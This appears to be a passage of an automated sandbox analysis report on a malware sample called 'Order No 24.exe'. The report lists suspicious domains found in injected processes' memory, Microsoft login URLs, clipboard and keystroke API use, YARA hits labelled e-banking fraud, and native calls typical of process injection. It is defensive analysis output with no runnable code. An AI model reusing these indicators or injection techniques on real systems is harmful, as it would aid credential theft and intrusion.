                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Yushaliu.online
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4580363583.00000000051EF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4580363583.00000000051EF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app/ucmb/
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/Dr._Sebi.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXMdO%2BojgjGE
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/Maas.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXMdO%2BojgjGEJMSh
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/USHA_Handball.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXMdO%2Bo
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/United_States_Handball.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOv
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/Usha_Sewing_Machine.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXM
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yushaliu.online/__media__/design/underconstructionnotice.php?d=yushaliu.online
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yushaliu.online/__media__/js/trademark.php?d=yushaliu.online&type=ns
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.consentmanager.net
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://delivery.consentmanager.net
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000004.00000002.4576398296.000000000296D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000004.00000003.2494315941.00000000079AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: net.exe, 00000004.00000002.4576398296.000000000296D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://Y
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000004.00000002.4576398296.000000000296D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 00000004.00000002.4578877580.0000000003C18000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003438000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_00983D19: This is a third-party compiled AutoIt script.
                Source: Order No 24.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Order No 24.exe, 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_a1197d38-f
                Source: Order No 24.exe, 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_36fe4873-d
                Source: Order No 24.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_aaa58414-7
                Source: Order No 24.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_518d1754-f
                Source: initial sample | Static PE information: Filename: Order No 24.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004BCA43 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D70 NtOpenThread
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F54340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F54650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F535C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F539B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F52D00 NtSetInformationFile
